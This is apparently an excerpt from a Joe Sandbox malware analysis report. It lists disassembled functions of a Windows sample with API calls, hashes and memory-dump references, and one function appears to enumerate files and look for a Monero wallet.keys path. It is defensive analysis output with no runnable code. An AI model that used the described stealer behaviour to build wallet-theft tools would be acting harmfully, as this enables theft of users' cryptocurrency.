                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: c3fefd8dbbce9816af55a2d45fb5196265aef7a471f0311b0463603df1f5af91
                                  • Instruction ID: 6cb213d6ecd5bfd1f7dcf642680b0718f80810a536e9d34fe0f3d89aa1cda5b5
                                  • Opcode Fuzzy Hash: c3fefd8dbbce9816af55a2d45fb5196265aef7a471f0311b0463603df1f5af91
                                  • Instruction Fuzzy Hash: E2914872D04104ABCB14FB74DC96DFD77BCAB95300F4085D8F90A96551EE74AB09CBA2
                                  Function 00BB7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,00BC05AF), ref: 00BB7BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00BB7BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00BB7C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00BB7C62
                                  • LocalFree.KERNEL32(00000000), ref: 00BB7D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 0720a78fcc45f0ebe7eae08d18d83a249ea87ff3b2220a685e45602577495c36
                                  • Instruction ID: 0eade3cd21de7c107f3782c29c88261d4100c4acc1a401e7e928cbf5c9192661
                                  • Opcode Fuzzy Hash: 0720a78fcc45f0ebe7eae08d18d83a249ea87ff3b2220a685e45602577495c36
                                  • Instruction Fuzzy Hash: C8412C71940218ABDB24EB94DC99BFDB7B8FB44700F6041D9E009A6291DBB46F85CFA1
                                  Function 00F7A312 Relevance: 10.3, Strings: 7, Instructions: 1580COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :_=z$Po:$Z5Zk$]D?$k52$pX/~$0/
                                  • API String ID: 0-1813028665
                                  • Opcode ID: b1cc36254268c4a80521ac07d6d731d57f924bfacac4a8de9b55b17c4f34affe
                                  • Instruction ID: c0b1c7629a14628355046049c376fac7af5dc5d85e13eca40873aa24dd6cc578
                                  • Opcode Fuzzy Hash: b1cc36254268c4a80521ac07d6d731d57f924bfacac4a8de9b55b17c4f34affe
                                  • Instruction Fuzzy Hash: 91B2C8F360C200AFE304AE2DDC8577ABBE9EF94720F16893DE6C4D7744E63598058696
                                  Function 00BAE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00BC0D73), ref: 00BAE4A2
                                  • StrCmpCA.SHLWAPI(?,00BC14F8), ref: 00BAE4F2
                                  • StrCmpCA.SHLWAPI(?,00BC14FC), ref: 00BAE508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAEBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 600e5da3ef969ce3338e23e5677e888313b6cd682d985fb37400c14b2ddcbe40
                                  • Instruction ID: b3240e183760d2f3e5555aa19ddf32122bec8ac5634c0ad6da6a3760b5b40a36
                                  • Opcode Fuzzy Hash: 600e5da3ef969ce3338e23e5677e888313b6cd682d985fb37400c14b2ddcbe40
                                  • Instruction Fuzzy Hash: 8D124271D10114ABDB24FB60DCA6EFD73B8AF54300F4045E9B50AA6191EFB06F49CBA2
                                  Function 00F7F21C Relevance: 9.1, Strings: 6, Instructions: 1629COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 'djB$4Ivw$?ow$V|l$v+^$n1y
                                  • API String ID: 0-643026759
                                  • Opcode ID: 9f35e1fcff98538de500abb74c9a27008bf3fb033208fbb656900551a01859a0
                                  • Instruction ID: 437cc062085851d770ba269fe02ed6868fea34aea765101712d9be9587d3b005
                                  • Opcode Fuzzy Hash: 9f35e1fcff98538de500abb74c9a27008bf3fb033208fbb656900551a01859a0
                                  • Instruction Fuzzy Hash: F2B206F360C204AFE304AE29EC8567AB7E5EF94720F1A893DE6C4C7744EA3558058697
                                  Function 00F788C1 Relevance: 9.1, Strings: 6, Instructions: 1563COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 5{9$0R3v$:~G$F0sw$b3$&e
                                  • API String ID: 0-1338521003
                                  • Opcode ID: 0dfb7d4516bb67fb19424ed56be6b6156d130f83d596caff2d802e9358f4f0b7
                                  • Instruction ID: 1e2ab30589f6bb7fa9e042d907b47f3963900f56e8a53099d4dbb12c05d5a62c
                                  • Opcode Fuzzy Hash: 0dfb7d4516bb67fb19424ed56be6b6156d130f83d596caff2d802e9358f4f0b7
                                  • Instruction Fuzzy Hash: D4B203F3A0C214AFE3046E2DEC8577ABBE9EB94320F16493DEAC4D3744E63558058697
                                  Function 00F7D7A1 Relevance: 7.9, Strings: 5, Instructions: 1633COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0:$Q,W$h]L$k{?$||?
                                  • API String ID: 0-2339966404
                                  • Opcode ID: b7ef95cb3f442047c07c33f29fe8b23d665ab210f6de7b1a848d5e035639bf6b
                                  • Instruction ID: c11a760d0ae046e045b9d958254f0407a33fa577f7ea93135567eadf7624dae1
                                  • Opcode Fuzzy Hash: b7ef95cb3f442047c07c33f29fe8b23d665ab210f6de7b1a848d5e035639bf6b
                                  • Instruction Fuzzy Hash: 55B229F3A0C2049FE3046E2DEC8567AFBE9EFD4720F1A853DEAC483744E67558058696
                                  Function 00F76D70 Relevance: 7.9, Strings: 5, Instructions: 1631COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: -%W$7(<^$[D?g$mh=$w$}v
                                  • API String ID: 0-3975050654
                                  • Opcode ID: 0350f7b45accace059152ecd9287391823a2f1fef46653178c6b3bb89e6af65d
                                  • Instruction ID: eb878a35c1ebc9554bd159f54fb13f50b28caf730315d54347b05e1720ab3f67
                                  • Opcode Fuzzy Hash: 0350f7b45accace059152ecd9287391823a2f1fef46653178c6b3bb89e6af65d
                                  • Instruction Fuzzy Hash: 04B20AF360C2009FE7046E2DEC8567AFBE9EF94720F16493EEAC5C3744EA3558058696
                                  Function 00F7BD3F Relevance: 7.9, Strings: 5, Instructions: 1619COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: B9w$Gv]$Mlg$N.{g$H}m
                                  • API String ID: 0-1474871554
                                  • Opcode ID: b45ba1a5c489b783d4b4f659b076ff25e1f3ec4bf07799492160676bb643e67e
                                  • Instruction ID: 3dbf463ef0a08f439ea375f7056d6dc8908deee39b27280163a6ba4e2ff7b6a2
                                  • Opcode Fuzzy Hash: b45ba1a5c489b783d4b4f659b076ff25e1f3ec4bf07799492160676bb643e67e
                                  • Instruction Fuzzy Hash: BCB23BF3A0C204AFE304AE2DEC85A7AFBE9EF94720F16493DE6C5C3744E53558058696
                                  Function 00F828F2 Relevance: 7.8, Strings: 5, Instructions: 1568COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: =ux$T$?$ae_$gjn$r[
                                  • API String ID: 0-3134275356
                                  • Opcode ID: 7b41f8b00b6afa89d1a7a0ceb616bce749d9f1eee6ddf8466238aa19ec823bd6
                                  • Instruction ID: 30504bf31b7c7e2eb99cff2aa04dfb5de1a76d1a5b1578334672b369aac577e9
                                  • Opcode Fuzzy Hash: 7b41f8b00b6afa89d1a7a0ceb616bce749d9f1eee6ddf8466238aa19ec823bd6
                                  • Instruction Fuzzy Hash: 64B206F3A0C2109FE3046E2DEC8566AFBE9EF94720F1A493DEAC4D7744E63558048796
                                  Function 00BAC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BAC871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BAC87C
                                  • lstrcat.KERNEL32(?,00BC0B46), ref: 00BAC943
                                  • lstrcat.KERNEL32(?,00BC0B47), ref: 00BAC957
                                  • lstrcat.KERNEL32(?,00BC0B4E), ref: 00BAC978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 904c5fffa0650c14f0111f8a7057592036b22753cfcec97b74e152a98c731f56
                                  • Instruction ID: 779bea64f7f8d8a56671353414a8c916ea79d5985791751c0e3724e89598cbdc
                                  • Opcode Fuzzy Hash: 904c5fffa0650c14f0111f8a7057592036b22753cfcec97b74e152a98c731f56
                                  • Instruction Fuzzy Hash: 8A41307590431ADBDB10DFA4DDC9BEEBBB8BB48704F1045A8F509A6280D7746A84CFA1
                                  Function 00BA7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
